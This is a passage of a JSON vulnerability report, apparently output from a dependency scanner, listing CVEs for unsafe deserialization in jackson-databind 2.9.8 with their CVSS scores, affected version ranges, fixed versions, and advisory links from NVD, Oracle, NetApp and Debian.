cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36180/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36185"]}],"cve":"CVE-2020-36185","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:02","ids":[{"system_name":"CVE Record","text":"CVE-2020-36185"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets 
and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36185"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36185/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10672"]}],"cve":"CVE-2020-10672","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T16:32:59","ids":[{"system_name":"CVE Record","text":"CVE-2020-10672"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory (aka aries.transaction.jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10672"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10672/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36179"]}],"cve":"CVE-2020-36179","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-36179"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc255f41d9a61d3dc79a51fb5c713de4ae10e71e3673feeb0b180b436@%3Cissues.spark.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36179"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36179/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36183"]}],"cve":"CVE-2020-36183","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:34","ids":[{"system_name":"CVE Record","text":"CVE-2020-36183"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36183"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.00|<2.9.10.8"]}],"title":"CVE-2020-36183/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11113"]}],"cve":"CVE-2020-11113","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-11113"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11113"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11113/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14062"]}],"cve":"CVE-2020-14062","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-14062"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14062"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14062/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-14061"]}],"cve":"CVE-2020-14061","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-18T14:44:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-14061"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200702-0003"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in Jackson Databind"},{"category":"details","details":"Vulnerability 
Details","text":"# Deserialization of untrusted data in Jackson Databind FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.5"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14061"},{"summary":"NetApp Advisory ntap-20200702-0003","url":"https://security.netapp.com/advisory/ntap-20200702-0003"},{"summary":"Snyk Advisory SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316","url":"https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.5"]}],"title":"CVE-2020-14061/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36181"]}],"cve":"CVE-2020-36181","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-36181"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36181"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36181/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36188"]}],"cve":"CVE-2020-36188","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:42","ids":[{"system_name":"CVE Record","text":"CVE-2020-36188"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
